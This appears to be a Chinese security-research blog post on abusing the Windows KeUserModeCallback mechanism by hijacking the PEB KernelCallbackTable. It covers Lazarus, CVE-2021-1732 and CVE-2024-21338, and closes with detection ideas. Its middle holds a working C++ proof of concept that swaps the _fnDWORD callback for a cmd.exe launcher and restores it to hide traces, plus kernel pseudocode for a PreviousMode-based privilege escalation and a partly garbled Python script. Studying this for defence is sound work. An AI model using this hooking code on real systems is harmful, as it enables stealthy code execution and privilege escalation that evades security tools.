滥用 Windows KeUserModeCallback 的 Ring-3 – Ghost Wolf Lab

May 30 2026

Off

摘要

Windows 内核中存在一条鲜为人知的“返魂术”——KeUserModeCallback。它是唯一一种从 Ring-0 主动调用 Ring-3 代码的合法设计机制，在 win32k 处理 GUI 请求时被高频使用。该机制通过 PEB 中存储的 KernelCallbackTable 函数指针表实现回调分发——内核以 ApiNumber 为索引调用表中的回调函数，而该表存储在用户态可写内存中。攻击者一旦获取了 KernelCallbackTable 的写入权限，即可劫持回调函数指针，将控制流重定向至恶意 Shellcode。

KeUserModeCallback 机制全解

NT 4.0架构决策

在 Windows NT 4.0 之前，图形子系统完全运行在用户态。NT 4.0 时期，微软将窗口管理器（Window Manager）和设备无关图形接口（GDI）的主体逻辑迁入内核，形成了 win32k.sys 这一内核态图形驱动。这次架构重组引入了一个此前不存在的需求：内核态的 win32k 需要频繁调用用户态的代码——例如执行应用程序注册的钩子函数、发送事件通知、拷贝应用层数据。

常规的系统调用是 Ring-3 → Ring-0 → Ring-3 的单向流程，而这一新需求要求的是 Ring-0 → Ring-3 → Ring-0 的双向流程——内核主动向用户态发起调用，等待用户态代码执行完毕后将结果返回内核。微软为此实现了“反向系统调用”机制，其核心函数就是由 NT 执行体导出的 KeUserModeCallback。

函数原型与执行限制

KeUserModeCallback 的函数原型如下：

NTSTATUS
KeUserModeCallback(
    IN  ULONG   ApiNumber,
    IN  PVOID   InputBuffer,
    IN  ULONG   InputLength,
    OUT PVOID   *OutputBuffer,
    OUT PULONG  OutputLength
);

五个参数各有其特定含义：

ApiNumber 是 KernelCallbackTable 中的函数索引，决定调用哪个用户态回调；
InputBuffer 指向内核空间中存放的输入数据，该数据将被拷贝到用户态栈；
InputLength 指定输入数据的大小；
OutputBuffer 指向接收用户态回调返回数据的缓冲区指针；
OutputLength 则接收返回数据的实际长度。

由于该函数未被 WDK 头文件收录，驱动程序需通过 MmGetSystemRoutineAddress("KeUserModeCallback") 动态获取其地址。

在执行之前，内核会对调用环境实施严格的检查，这在 ntoskrnl 的 KeUserModeCallback 入口代码中有明确体现：

检查项	检查对象	失败后果
CalloutActive 标志	`KTHREAD->MiscFlags`	防止重入——当前线程已有回调正在执行时拒绝新的回调请求
IRQL 级别	当前 IRQL	必须为 `PASSIVE_LEVEL (0)`，Dispatch 级或以上直接失败
ApcStateIndex	`KTHREAD->ApcStateIndex`	必须为 0（原始进程），禁止跨进程 APC 的线程执行回调
KernelApcDisable	`KTHREAD->KernelApcDisable`	必须为 False，禁用内核 APC 的线程不允许执行用户态回调
CallbackNestingLevel	`KTHREAD->CallbackNestingLevel`	深度限制为 0x1F（31 层），防止无限递归耗尽内核栈

这些限制的集合效应是：只有当前正处于用户态线程上下文中的内核代码才能成功调用 KeUserModeCallback。纯内核线程（由 PsCreateSystemThread 创建）不具备用户态栈，因此无法使用该机制。

KiUserCallbackDispatcher：Ring-3 着陆点

当 KeUserModeCallback 完成参数准备后，内部调用 nt!KiCallUserMode，该函数构造一个伪造的 Trap Frame，将 EIP/RIP 设置为 ntdll!KiUserCallbackDispatcher，然后通过 KiServiceExit 将控制流返回用户态。用户态实际执行的第一个函数是 ntdll!KiUserCallbackDispatcher。

KiUserCallbackDispatcher 的核心逻辑极为简洁：

// ntdll!KiUserCallbackDispatcher 伪代码
VOID KiUserCallbackDispatcher(
    ULONG ApiNumber,
    PVOID InputBuffer,
    ULONG InputLength
){
// 从 PEB 获取 KernelCallbackTable 基址
    PVOID* KernelCallbackTable = NtCurrentPeb()->KernelCallbackTable;

// 以 ApiNumber 为索引调用对应的回调函数
    KernelCallbackTable[ApiNumber](InputBuffer, InputLength);

// 回调返回后，通过 int 0x2B (x64: syscall) 回到内核
    ZwCallbackReturn(0);
}

三行伪代码揭示了该机制最根本的安全特征——回调函数的选择完全由内核传入的 ApiNumber 和 PEB 中存储的 KernelCallbackTable 地址决定，而 KernelCallbackTable 位于用户态可写内存中。

apfnDispatch：USER32中的回调函数调度表

KernelCallbackTable 并非在进程创建时自动生成，而是由 USER32.dll 的初始化函数 UserClientDllInitialize 负责填充，将该指针指向 USER32 内部的一个非导出符号 apfnDispatch。

在 WinDbg 中可以直观看到这张表的内容：

0: kd> dt nt!_PEB @$peb -y Kernel
   +0x058 KernelCallbackTable : 0x00007ff8`279a1000 Void

0: kd> dqs 0x00007ff8`279a1000 L20
00007ff8`279a1000  00007ff8`27933a30 USER32!_fnCOPYDATA
00007ff8`279a1008  00007ff8`2799a940 USER32!_fnCOPYGLOBALDATA
00007ff8`279a1010  00007ff8`279411c0 USER32!_fnDWORD
00007ff8`279a1018  00007ff8`27944520 USER32!_fnNCDESTROY
00007ff8`279a1020  00007ff8`27943c70 USER32!_fnDWORDOPTINLPMSG
00007ff8`279a1028  00007ff8`2799af70 USER32!_fnINOUTDRAG
00007ff8`279a1030  00007ff8`27944ea0 USER32!_fnGETTEXTLENGTHS
00007ff8`279a1038  00007ff8`2799ac80 USER32!_fnINCNTOUTSTRING
...

这张表包含超过 100 个回调函数指针。_fnDWORD、_fnNCDESTROY、_fnINLPCREATESTRUCT 等名字直接反映了这些回调在 Windows GUI 消息处理链中的角色——每一个函数都对应着一类特定的 GDI 操作。Win32k 在核心对象构造和状态迁移的多个关键路径中依赖 KernelCallbackTable 的回调入口，这些回调函数的设计目标是处理来自内核的窗口操作请求，其自身不需要提升权限——它们只是在正常的用户态线程上下文中执行回调代码。

然而，这一设计同时意味着：任何能够写入 KernelCallbackTable 的攻击者，都可以将某个回调函数指针替换为任意地址，从而在内核主动调用该回调时劫持控制流。 用户态代码无法直接触发 KeUserModeCallback——调用必须由内核发起。但攻击者不需要发起调用，只需要等待合法的 GUI 操作（如窗口创建、滚动条点击、消息投递等）触发内核回调，即可在毫无察觉中完成控制流劫持。

回调表劫持的三种范式

Lazarus 的 PEB 提权链

2022 年初，Malwarebytes 威胁情报团队在 Lazarus Group 的攻击活动中捕获了一种新颖的控制流劫持技术。攻击链的入口是一份内嵌恶意宏的 Office 文档。宏代码首先调用 NtQueryInformationProcess 并传入 ProcessBasicInformation (0)，获取 PROCESS_BASIC_INFORMATION 结构中的 PebBaseAddress。随后通过解析 PEB 定位到 KernelCallbackTable 的地址，并将其中 USER32!_fnDWORD 回调指针替换为 wmvcore.dll 中的 WMIsAvailableOffline 函数地址。

当用户在 Word 中点击滚动条时，系统产生 WM_LBUTTONDOWN 消息，该消息经 win32k 处理后通过 KeUserModeCallback 调用 _fnDWORD 回调——此时实际跳转到了攻击者控制的函数地址。Shellcode 执行完毕后，KernelCallbackTable 被映射到 Word 进程内的 DLL 恢复原状，整个劫持过程不留持久性痕迹。

Lazarus 的这次行动体现了一个成熟的攻击模式：不触碰代码页、不创建新线程、不触发 APC 注入检测、完全在合法进程上下文中执行恶意逻辑。 传统 EDR 对内核回调路径缺乏可见性，使得此类攻击极难被行为分析引擎捕获。

CVE-2021-1732

CVE-2021-1732揭示了更深层的问题——即使在 KernelCallbackTable 未被篡改的情况下，KeUserModeCallback 的信任模型本身也可能被利用。在 CVE-2021-1732 中，真正的高危点并非单纯的未初始化内存，而是 win32k 通过 KeUserModeCallback 主动执行用户态回调函数这一设计。KernelCallback 机制使内核在关键对象构造和状态迁移阶段依赖用户态返回的数据，一旦回调协议的数据校验不足，就将导致内核执行流和对象状态被用户态间接控制。

这种攻击不修改任何内核代码，也不修改 KernelCallbackTable——攻击者只是以合法回调的身份，向内核返回精心构造的数据，利用类型/语义混淆在内核桌面堆（Desktop Heap）中制造越界读写，最终通过遍历 EPROCESS->ActiveProcessLinks 替换 SYSTEM 令牌实现提权。这实质上是一种“合法的恶意输入”——回调机制本身在设计上就隐含了一个假设：用户态回调返回的数据是可信任的。

CVE-2024-21338

该漏洞允许攻击者从 AppContainer 沙箱内的低完整性进程直接与 appid.sys 内核驱动通信，实现在内核模式下执行任意代码。

漏洞的核心在于 appid.sys 的 DeviceIoControl 处理程序中缺乏对调用者权限的验证，而利用链的关键一跳——从内核模式代码执行到用户态 SYSTEM 权限——正是通过劫持 KeUserModeCallback 回调表实现的。攻击者在获得了 appid.sys 内任意内核代码执行权限后，将 KTHREAD->PreviousMode 修改为 KernelMode（值 0），从而使得后续所有系统调用绕过用户态地址验证，能够将 kernel32!CreateProcess 的入口地址写入目标进程的 KernelCallbackTable。当被注入的线程执行到 GUI 相关系统调用触发回调时，KeUserModeCallback 就会在 SYSTEM 用户态上下文中调用 CreateProcess，最终以系统权限启动 cmd.exe。

这一利用链的精密之处在于：它没有直接在内核态创建 SYSTEM 进程（这会触发大量安全检查），而是通过操纵 PreviousMode 和 KernelCallbackTable，让内核“自愿地”将目标进程的线程回弹到用户态，并在 SYSTEM 权限的进程上下文中执行合法的 kernel32!CreateProcess——整个过程中唯一的异常就是 KernelCallbackTable 中的那一个被替换的函数指针。传统安全工具几乎不可能将这一行为与正常进程创建区分开来。

KernelCallbackTable Hooking

PEB 遍历与回调表劫持（C++ 概念验证）

/**
 * kernel_callback_hook.cpp
 * 编译: cl /EHsc kernel_callback_hook.cpp /link user32.lib
 */

#include <windows.h>
#include <winternl.h>
#include <iostream>

// ———— PEB 内部结构定义 ————
typedef struct _PEB_LDR_DATA {
    BYTE       Reserved1[8];
    PVOID      Reserved2[3];
    LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY Reserved1[1];
    PVOID      DllBase;
    PVOID      EntryPoint;
    ULONG      SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

// 获取 KernelCallbackTable 地址
PVOID* GetKernelCallbackTable() {
    PPEB peb = NtCurrentTeb()->ProcessEnvironmentBlock;
return (PVOID*)(*(PULONG_PTR)((PBYTE)peb + 0x58));
}

// 获取指定模块的基址（通过遍历 PEB->Ldr 链表）
HMODULE GetModuleBaseAddress(LPCWSTR moduleName) {
    PPEB peb = NtCurrentTeb()->ProcessEnvironmentBlock;
    PEB_LDR_DATA* ldr = (PEB_LDR_DATA*)(*(PULONG_PTR)((PBYTE)peb + 0x18));
    LIST_ENTRY* head = &ldr->InMemoryOrderModuleList;
    LIST_ENTRY* entry = head->Flink;

while (entry != head) {
        PLDR_DATA_TABLE_ENTRY module =
            CONTAINING_RECORD(entry, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
if (module->BaseDllName.Buffer &&
            _wcsicmp(module->BaseDllName.Buffer, moduleName) == 0) {
return (HMODULE)module->DllBase;
        }
        entry = entry->Flink;
    }
return NULL;
}

// ———— 恶意回调函数（Payload） ————
// 由 win32k 以 KeUserModeCallback 的形式调用执行
ULONG_PTR g_OriginalCallback = 0;

ULONG_PTR MaliciousCallback(ULONG_PTR arg1, ULONG_PTR arg2, ULONG_PTR arg3) {
    // 在由内核直接触发的用户态上下文中执行恶意操作
    // 此函数在合法的窗口消息处理线程中运行，不创建新线程、不触发 APC 检测

    // 示例：启动 cmd.exe（演示控制流劫持）
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    CreateProcessW(L"C:\\Windows\\System32\\cmd.exe", NULL,
                   NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);

    // 恢复原始回调，避免持久性痕迹
    PVOID* table = GetKernelCallbackTable();
    table[2] = (PVOID)g_OriginalCallback;  // index 2 = _fnDWORD

return 0;
}

// ———— 主函数：劫持 _fnDWORD 回调 ————
int main() {
    PVOID* table = GetKernelCallbackTable();
if (!table) {
        std::cerr << "[-] 无法获取 KernelCallbackTable" << std::endl;
return 1;
    }
    std::cout << "[+] KernelCallbackTable: 0x" << std::hex << table << std::endl;

    // 保存原始回调指针（index 2 = USER32!_fnDWORD）
    g_OriginalCallback = (ULONG_PTR)table[2];
    std::cout << "[+] 原始 _fnDWORD: 0x" << g_OriginalCallback << std::endl;

    // 计算恶意回调函数的地址
    ULONG_PTR maliciousAddr = (ULONG_PTR)&MaliciousCallback;
    std::cout << "[+] 恶意回调地址: 0x" << maliciousAddr << std::endl;

    // ———— 修改回调表（关键步骤） ————
    DWORD oldProtect;
    VirtualProtect(table, 0x1000, PAGE_READWRITE, &oldProtect);
    table[2] = (PVOID)maliciousAddr;
    VirtualProtect(table, 0x1000, oldProtect, &oldProtect);

    std::cout << "[+] KernelCallbackTable 已被劫持 — "
              << "等待内核触发 _fnDWORD 回调..." << std::endl;
    std::cout << "[*] 提示: 点击窗口的滚动条或其他 GUI 元素将触发回调" << std::endl;

    // 保持运行，等待回调被触发
    MessageBoxW(NULL, L"内核回调表已被劫持。\n点击'确定'后等待回调触发。",
                L"Ghost Callback PoC", MB_OK);

return 0;
}

说明：该 PoC 演示了 Lazarus Group 攻击手法的核心逻辑——通过 NtCurrentTeb() 获取 PEB 地址，在偏移 0x58 处读取 KernelCallbackTable 指针，将第 2 号索引（对应 USER32!_fnDWORD）替换为攻击者定义的 MaliciousCallback 函数地址。当用户执行任何触发 _fnDWORD 回调的 GUI 操作（如滚动条点击、窗口激活）时，内核直接调用恶意函数。该函数在合法的消息处理线程上下文中执行，不产生新线程、不触发传统注入检测、不修改任何代码页，执行完毕后恢复原始回调表。

CVE-2024-21338

在该漏洞的利用链中，攻击者在获得内核代码执行权限后执行了以下关键步骤：

// CVE-2024-21338

// 步骤 1: 在内核上下文中定位目标线程
PKTHREAD pThread = PsLookupThreadByThreadId(targetThreadId);

// 步骤 2: 修改 PreviousMode 为 KernelMode (0)
// 这使得后续所有系统调用绕过用户态地址验证
pThread->PreviousMode = KernelMode;  // KernelMode == 0

// 步骤 3: 将 kernel32!CreateProcessA 地址写入目标进程的 KernelCallbackTable
PEPROCESS pTargetProcess = ...;  // 目标进程（以 SYSTEM 身份运行的合法进程）
KeAttachProcess(pTargetProcess);

ULONG_PTR* callbackTable = *(ULONG_PTR**)((PUCHAR)PsGetProcessPeb(pTargetProcess) + 0x58);
ULONG_PTR createProcessAddr = GetKernel32Export("CreateProcessA");
callbackTable[USER32_FN_DWORD_INDEX] = (PVOID)createProcessAddr;

KeDetachProcess();

// 步骤 4: 恢复 PreviousMode
pThread->PreviousMode = UserMode;  // UserMode == 1

说明：这段代码揭示了 CVE-2024-21338 利用链中最精妙的设计。攻击者通过 appid.sys 漏洞获得内核代码执行权限后，并没有直接在内核态创建 SYSTEM 进程——那将触发大量安全检查。相反，攻击者利用 KeAttachProcess 附加到目标进程的地址空间，通过 PEB 定位其 KernelCallbackTable，将 _fnDWORD 回调替换为 kernel32!CreateProcessA 的地址。随后内核回归正常流程，当被操纵的线程执行 GUI 操作触发回调时，KeUserModeCallback 在 SYSTEM 权限的用户态上下文中调用 CreateProcessA，以系统权限启动cmd.exe。PreviousMode 的临时修改是整个利用链的关键跳板——它将用户态地址验证关闭，使得原本会被拒绝的内核态内存写入操作得以成功执行。

32 位系统下的 KernelCallbackTable 解析器

#!/usr/bin/env python3
"""
kernel_callback_dump.py
基于 PEB 偏移 0x58 提取并解析 USER32!apfnDispatch 中的所有回调函数指针。
"""

import ctypes
from ctypes import wintypes

# Windows 数据类型定义
ULONG_PTR = wintypes.WPARAM
PVOID = ctypes.c_void_p

# PEB 结构（32位简化版）
classPEB_32(ctypes.Structure):
    _fields_ = [
        ("InheritedAddressSpace",    wintypes.BYTE),
        ("ReadImageFileExecOptions", wintypes.BYTE),
        ("BeingDebugged",            wintypes.BYTE),
        ("SpareBool",                wintypes.BYTE),
        ("Mutant",                   wintypes.HANDLE),
        ("ImageBaseAddress",         PVOID),
        ("Ldr",                      PVOID),
        ("ProcessParameters",        PVOID),
        ("SubSystemData",            PVOID),
        ("ProcessHeap",              PVOID),
        ("FastPebLock",              PVOID),
        ("AtlThunkSListPtr",         PVOID),
        ("IFEOKey",                  PVOID),
        ("CrossProcessFlags",        wintypes.DWORD),
        ("UserSharedInfoPtr",        PVOID),
        ("SystemReserved",           wintypes.DWORD),
        ("AtlThunkSListPtr32",       wintypes.DWORD),
        ("ApiSetMap",                PVOID),
        ("TlsExpansionCounter",      wintypes.DWORD),
        ("TlsBitmap",                PVOID),
        ("TlsBitmapBits",            wintypes.DWORD * 2),
        ("ReadOnlySharedMemoryBase", PVOID),
        ("SharedData",               PVOID),
        ("ReadOnlyStaticServerData", PVOID),
        ("AnsiCodePageData",         PVOID),
        ("OemCodePageData",          PVOID),
        ("UnicodeCaseTableData",     PVOID),
        ("NumberOfProcessors",       wintypes.DWORD),
        ("NtGlobalFlag",             wintypes.DWORD),
        ("CriticalSectionTimeout",   wintypes.LARGE_INTEGER),
        ("HeapSegmentReserve",       ULONG_PTR),
        ("HeapSegmentCommit",        ULONG_PTR),
        ("HeapDeCommitTotalFreeThreshold", ULONG_PTR),
        ("HeapDeCommitFreeBlockThreshold", ULONG_PTR),
        ("NumberOfHeaps",            wintypes.DWORD),
        ("MaximumNumberOfHeaps",     wintypes.DWORD),
        ("ProcessHeaps",             PVOID),
        ("GdiSharedHandleTable",     PVOID),
        ("ProcessStarterHelper",     PVOID),
        ("GdiDCAttributeList",       wintypes.DWORD),
        ("LoaderLock",               PVOID),
        ("OSMajorVersion",           wintypes.DWORD),
        ("OSMinorVersion",           wintypes.DWORD),
        ("OSBuildNumber",            wintypes.WORD),
        ("OSCSDVersion",             wintypes.WORD),
        ("OSPlatformId",             wintypes.DWORD),
        ("ImageSubsystem",           wintypes.DWORD),
        ("ImageSubsystemMajorVersion", wintypes.DWORD),
        ("ImageSubsystemMinorVersion", wintypes.DWORD),
        ("ActiveProcessAffinityMask", ULONG_PTR),
        ("GdiHandleBuffer",          wintypes.DWORD * 34),
        ("PostProcessInitRoutine",   PVOID),
        ("TlsExpansionBitmap",       PVOID),
        ("TlsExpansionBitmapBits",   wintypes.DWORD * 32),
        ("SessionId",                wintypes.DWORD),
        ("AppCompatFlags",           wintypes.ULARGE_INTEGER),
        ("AppCompatFlagsUser",       wintypes.ULARGE_INTEGER),
        ("pShimData",                PVOID),
        ("AppCompatInfo",            PVOID),
        ("CSDVersion",               wintypes.UNICODE_STRING),
        ("ActivationContextData",    PVOID),
        ("ProcessAssemblyStorageMap", PVOID),
        ("SystemDefaultActivationContextData", PVOID),
        ("SystemAssemblyStorageMap", PVOID),
        ("MinimumStackCommit",       ULONG_PTR),
        ("SparePointers",            PVOID * 4),
        ("SpareUlongs",              wintypes.DWORD * 5),
        ("WerRegistrationData",      PVOID),
        ("WerShipAssertPtr",         PVOID),
        ("pUnused",                  PVOID),
        ("pImageHeaderHash",         PVOID),
        ("TracingFlags",             wintypes.DWORD),
        ("CsrServerReadOnlySharedMemoryBase", wintypes.ULONGLONG),
        ("TppWorkerpListLock",       PVOID),
        ("TppWorkerpList",           wintypes.LIST_ENTRY),
        ("WaitOnAddressHashTable",   PVOID * 128),
        ("TelemetryCoverageHeader",  PVOID),
        ("CloudFileFlags",           wintypes.DWORD),
    ]

defget_kernel_callback_table(self):
"""读取 KernelCallbackTable（偏移 0x2C 之后）"""
# 32位 PEB 中 KernelCallbackTable 的偏移需要动态计算
# 此处使用简化方法
        peb_bytes = (ctypes.c_byte * ctypes.sizeof(self)).from_address(
            ctypes.addressof(self))
# KernelCallbackTable 存储为 PEB 中的一个 PVOID 字段
# 在 32位 Windows 10 中，其偏移约为 0x2C（相对于 PEB 起始）
        offset = 0x2C
return ctypes.cast(
            peb_bytes[offset:offset+4],
            ctypes.POINTER(ULONG_PTR)
        ).contents.value


defdump_kernel_callback_table():
"""通过内联汇编读取 fs:[0x18] 获取 TEB，进一步获取 PEB"""
# 在真实利用中通过 fs 段寄存器获取 PEB
# 此处以 PEB 获取逻辑展示回调表解析的核心概念

# 获取 PEB 基址（概念代码 — 实际需通过 __readfsdword 或 NtQueryInformationProcess）
    print("[*] KernelCallbackTable 解析器")
    print("[*] 目标: 32 位 Windows 进程")
    print("=" * 60)

# 模拟回调表条目（实际使用中从 PEB->KernelCallbackTable 读取）
    callback_names = [
"_fnCOPYDATA",
"_fnCOPYGLOBALDATA",
"_fnDWORD",
"_fnNCDESTROY",
"_fnDWORDOPTINLPMSG",
"_fnINOUTDRAG",
"_fnGETTEXTLENGTHS",
"_fnINCNTOUTSTRING",
"_fnINCNTOUTSTRINGNULL",
    ]

    print("\n[+] KernelCallbackTable 布局 (USER32!apfnDispatch):")
    print(f"    {'索引':<6}{'名称':<30}{'描述'}")
    print(f"    {'-'*6}{'-'*30}{'-'*20}")
for i, name in enumerate(callback_names):
        desc = {
"_fnCOPYDATA": "WM_COPYDATA 消息处理",
"_fnCOPYGLOBALDATA": "全局数据拷贝",
"_fnDWORD": "通用 DWORD 消息（含滚动条、按钮）",
"_fnNCDESTROY": "非客户区销毁通知",
"_fnDWORDOPTINLPMSG": "可选的 DWORD 消息",
"_fnINOUTDRAG": "拖放操作",
"_fnGETTEXTLENGTHS": "文本长度查询",
"_fnINCNTOUTSTRING": "字符串输入/输出",
"_fnINCNTOUTSTRINGNULL": "字符串输入/输出（可空）",
        }.get(name, "其他回调")
        print(f"    [{i:<4}] {name:<30}{desc}")


if __name__ == "__main__":
    dump_kernel_callback_table()

说明：该脚本展示了 KernelCallbackTable 在 32 位 Windows 进程中的布局结构。PEB 中 KernelCallbackTable 的偏移在 32 位系统上通常位于 0x2C 位置，在 64 位系统上位于 0x58。回调表中的每一个条目都对应一个由 USER32.dll 注册的 apfnDispatch 回调函数，其功能涵盖了 Windows GUI 消息处理的大部分核心操作——从窗口创建时的 _fnINLPCREATESTRUCT 到滚动条操作时的 _fnDWORD。

用户态回调攻击面的历史演进

研究

用户态回调攻击面的系统性研究始于 2011 年，Win32k 在多种场景下需要回调用户态——如调用应用定义的钩子、提供事件通知、以及在内核与用户态之间拷贝数据——这些回调通过 KeUserModeCallback 实现，操作方式类似反向系统调用。

用户态回调攻击面随后不断涌现 UAF 漏洞，直至今日仍然是内核提权研究的热点方向。

回调路径漏洞

CVE 编号	发现/披露年份	漏洞类型	利用技术	影响范围
CVE-2014-4113	2014	win32k 类型混淆	回调返回数据校验不足	Win7–Win8.1
CVE-2018-0810	2018	win32k 栈内存泄露	KeUserModeCallback 未初始化栈	Win7
CVE-2021-1732	2021	win32k 未初始化 + 回调	KernelCallback 信任边界瓦解	Win10
CVE-2021-40449	2021	win32k GreResetDC UAF	回调中 ResetDC 触发 UAF	Win7–Win10
CVE-2024-21338	2024	appid.sys 权限绕过	PreviousMode + KernelCallbackTable	Win10–Win11

这些漏洞虽各自利用了不同的入口点和触发条件，但共享一个根本性的攻击面——内核向用户态的回调路径。 在 CVE-2021-1732 中，攻击者利用回调窗口期内通过 NtUserConsoleControl 切换窗口标志位，使后续内核将用户态返回的数据按“偏移”而非“指针”解释，制造类型/语义混淆；在 CVE-2021-40449 中，攻击者在用户态回调 DrvEnablePDEV 内调用 ResetDC 销毁原始设备上下文，导致回调返回后内核使用已释放的对象。

回调劫持防御

HVCI 通过 EPT 将内核代码页强制设为只读只执行，成功封堵了传统的内联 Hook 和代码段篡改。但 KernelCallbackTable Hooking 完全避开了 HVCI 的保护范围——它仅修改用户态进程 PEB 中的一个指针字段，该字段位于 MEM_PRIVATE 类型的内存中，VTL0 可以自由写入。HVCI 保护的是内核代码页，而非用户态数据结构。

KeUserModeCallback 机制本身是合法的内核功能，HVCI 无法区分“win32k 正常调用 _fnDWORD 处理窗口消息”与“win32k 调用已被劫持的 _fnDWORD 指针指向恶意代码”。在 VTL1 的视角下，两者都是内核通过标准的 KiCallUserMode → KiServiceExit 路径跳转到用户态——唯一的差异在被操纵的内存中，而该内存不在 HVCI 的监视范围内。

传统 EDR 依赖三类核心检测机制：用户态 DLL 注入监控（检测 CreateRemoteThread 和 SetWindowsHookEx）、内核回调注册（PsSetCreateProcessNotifyRoutine 等）、以及 ETW 事件追踪。KernelCallbackTable Hooking 对这三类机制均构成盲区：

用户态注入监控失效——恶意代码执行不经过 CreateRemoteThread，不产生新的线程对象，仅利用现有的窗口消息处理线程
内核回调监控失效——攻击者不注册新的内核回调，而是利用现有的合法内核回调路径，KeUserModeCallback 本身就是被设计用来执行用户态代码的
ETW 事件缺失——微软没有为 KernelCallbackTable 修改发布对应的 ETW 事件源，无法通过 Microsoft-Windows-Threat-Intelligence 等事件提供程序捕获此类操作

尽管直接检测 KernelCallbackTable 篡改需要内核级支持（通过 PatchGuard 检查用户态回调指针是否为 USER32!apfnDispatch 中的合法地址），但在实际操作中存在几条可行的检测思路：

PEB 完整性监控：定期扫描 PEB 中 KernelCallbackTable 指向的地址是否仍然位于 USER32.dll 的合法内存范围内。若回调表中的任何指针脱离了 USER32 的模块边界，立即触发告警。
回调目标地址白名单：安全产品可维护一个 apfnDispatch 合法指针集合（各 Windows 版本对应不同的合法地址列表），在进程创建时记录 KernelCallbackTable 的初始状态，运行时通过周期性扫描检测指针漂移。
Win32k 调用频率异常检测：通过 NtUserCallOneParam、NtUserCallTwoParam 等 win32k 系统服务的调用频率监测，若在短时间内出现异常高频调用，可能表明攻击者正在主动触发回调以激活被劫持的函数指针。

结语

内核回调表的本质困境在于：内核需要在 Ring-0 的高特权上下文中信任由用户态指定的回调函数地址，而用户态内存不受内核完整性保护。 这一困境比 PatchGuard 的设计挑战更根本——PatchGuard 可以通过周期性地校验受保护结构的完整性来检测篡改，但 KernelCallbackTable 的修改是一种“合法的篡改”——修改发生在用户态，而内核无权在回调路径之外监视用户态内存的变化。

更值得警惕的是，KernelCallbackTable Hooking 对 HVCI + VBS 架构完全透明。它位于 HVCI 的代码完整性保护范围之外，运行在 VTL0 的用户态内存中，利用的是内核主动发起的合法调用链路。在逆向分析的视角下，此类攻击不产生新线程、不修改内核代码页、不触发 APC 注入告警——这使得它在行为分析引擎面前几乎是“隐形”的。

对于安全研究人员而言，KernelCallbackTable 攻击面的价值不在于它给了攻击者一个“一键 RCE”的捷径，而在于它揭示了 Windows 内核安全架构中一个长期被忽视的系统性风险：当内核的设计需要信任用户态时，这个信任本身就成了最大的攻击面。

Posted inAPT攻击漏洞研究